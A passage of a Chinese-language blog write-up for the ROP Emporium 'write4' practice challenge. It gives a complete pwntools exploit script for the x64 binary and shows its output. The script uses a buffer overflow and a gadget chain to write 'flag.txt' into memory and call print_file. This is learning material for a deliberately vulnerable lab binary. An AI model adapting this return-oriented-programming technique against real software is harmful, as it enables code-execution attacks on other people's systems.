<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">write4 by ROP Emporium</span><br><span class="line">x86</span><br><span class="line"></span><br><span class="line">Go ahead and give me the input already!</span><br><span class="line"><span class="meta prompt_"></span></span><br><span class="line"><span class="meta prompt_">&gt; </span><span class="language-bash">Thank you!</span></span><br><span class="line">ROPE&#123;a_placeholder_32byte_flag!&#125;</span><br><span class="line">[*] Got EOF while reading in interactive</span><br><span class="line"><span class="meta prompt_">$ </span></span><br></pre></td></tr></table></figure>



<h2 id="x64"><a href="#x64" class="headerlink" title="x64"></a>x64</h2><p>64位与32位思路相同，需要多找一个传递函数参数的gadgets。</p>
<p>完整的exploit代码如下：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">p = process(<span class="string">&#x27;./write4&#x27;</span>)</span><br><span class="line">e = ELF(<span class="string">&#x27;./write4&#x27;</span>)</span><br><span class="line"></span><br><span class="line">print_addr = p64(e.plt[<span class="string">&quot;print_file&quot;</span>])</span><br><span class="line"></span><br><span class="line">flag_addr = p64(<span class="number">0x0000000000601028</span>)</span><br><span class="line"></span><br><span class="line">pop_data = p64(<span class="number">0x0000000000400690</span>) <span class="comment">#: pop r14 ; pop r15 ; ret</span></span><br><span class="line">mov_data =  p64(<span class="number">0x0000000000400628</span>)<span class="comment"># : mov qword ptr [r14], r15 ; ret</span></span><br><span class="line">pop_rdi = p64(<span class="number">0x0000000000400693</span>) <span class="comment">#: pop rdi ; ret</span></span><br><span class="line"></span><br><span class="line">offset = <span class="number">40</span></span><br><span class="line"></span><br><span class="line">payload = offset*<span class="string">b&#x27;A&#x27;</span></span><br><span class="line">payload+= pop_data +flag_addr+<span class="string">b&#x27;flag.txt&#x27;</span></span><br><span class="line">payload+= mov_data</span><br><span class="line">payload+= pop_rdi + flag_addr</span><br><span class="line">payload+= print_addr</span><br><span class="line"></span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<p>执行结果如下：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">write4 by ROP Emporium</span><br><span class="line">x86_64</span><br><span class="line"></span><br><span class="line">Go ahead and give me the input already!</span><br><span class="line"><span class="meta prompt_"></span></span><br><span class="line"><span class="meta prompt_">&gt; </span><span class="language-bash">Thank you!</span></span><br><span class="line">ROPE&#123;a_placeholder_32byte_flag!&#125;</span><br><span class="line">[*] Got EOF while reading in interactive</span><br><span class="line"><span class="meta prompt_">$ </span></span><br></pre></td></tr></table></figure>


    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/writeup/" rel="tag"># writeup</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2023/03/15/ROP_Emporium/Challenge3-callme/" rel="prev" title="Challenge3_callme">
      <i class="fa fa-chevron-left"></i> Challenge3_callme
    </a></div>
      <div class="post-nav-item">
    <a href="/2023/03/15/ROP_Emporium/Challenge5-badchars/" rel="next" title="Challenge5_badchars">
      Challenge5_badchars <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#write4"><span class="nav-number">1.</span> <span class="nav-text">write4</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#x86"><span class="nav-number">1.1.</span> <span class="nav-text">x86</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#x64"><span class="nav-number">1.2.</span> <span class="nav-text">x64</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="郭小白QAQ"
      src="https://guoxb.oss-cn-qingdao.aliyuncs.com/typora-imgs/202303122318253.jpg">
  <p class="site-author-name" itemprop="name">郭小白QAQ</p>
  <div class="site-description" itemprop="description">精彩不亮丽，起落是无常</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">57</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">22</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">8</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="/guoxb0_0@qq.com" title="E-Mail → guoxb0_0@qq.com"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
      </span>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2024</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">郭小白QAQ</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-chart-area"></i>
    </span>
    <span title="站点总字数">105k</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
    <span title="站点阅读时长">6:21</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>

<script src="/js/bookmark.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  
<script src="https://cdn.jsdelivr.net/npm/darkmode-js@1.5.7/lib/darkmode-js.min.js"></script>

<script>
var options = {
  bottom: '64px',
  right: 'unset',
  left: '32px',
  time: '0.5s',
  mixColor: 'transparent',
  backgroundColor: 'transparent',
  buttonColorDark: '#100f2c',
  buttonColorLight: '#fff',
  saveInCookies: true,
  label: '🌓',
  autoMatchOsTheme: true
}
const darkmode = new Darkmode(options);
window.darkmode = darkmode;
darkmode.showWidget();
</script>
<div class="moon-menu">
  <div class="moon-menu-items">
    
    <div id="moon-menu-item-back2bottom" class="moon-menu-item">
      <i class='fas fa-chevron-down'></i>    </div>
    
    <div id="moon-menu-item-back2top" class="moon-menu-item">
      <i class='fas fa-chevron-up'></i>    </div>
    
  </div>
  <div class="moon-menu-button">
    <svg class="moon-menu-bg">
      <circle class="moon-menu-cricle" cx="50%" cy="50%" r="44%"></circle>
      <circle class="moon-menu-border" cx="50%" cy="50%" r="48%"></circle>
    </svg>
    <div class="moon-menu-content">
      <div class="moon-menu-icon"><i class='fas fa-ellipsis-v'></i></div>
      <div class="moon-menu-text"></div>
    </div>
  </div>
</div><script src="/js/injector.js"></script>
</body>
</html>
